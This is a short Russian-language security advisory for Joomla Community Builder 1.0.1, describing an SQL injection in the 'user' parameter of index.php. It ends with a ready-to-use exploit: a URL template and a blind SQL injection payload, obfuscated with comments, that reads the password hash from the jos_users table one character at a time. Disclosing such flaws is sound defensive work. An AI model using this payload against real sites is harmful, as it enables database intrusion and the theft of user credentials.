Программа: Joomla Community Builder 1.0.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
/index.php?option=com_comprofiler&task=userProfile&user=[SQL]
/index.php?option=com_comprofiler&task=userProfile&user=1/* */and/**/mid((select/**/password/**/from/**/jos_users/* */limit/**/0,1),1,1)/**/</**/Char(97)/*
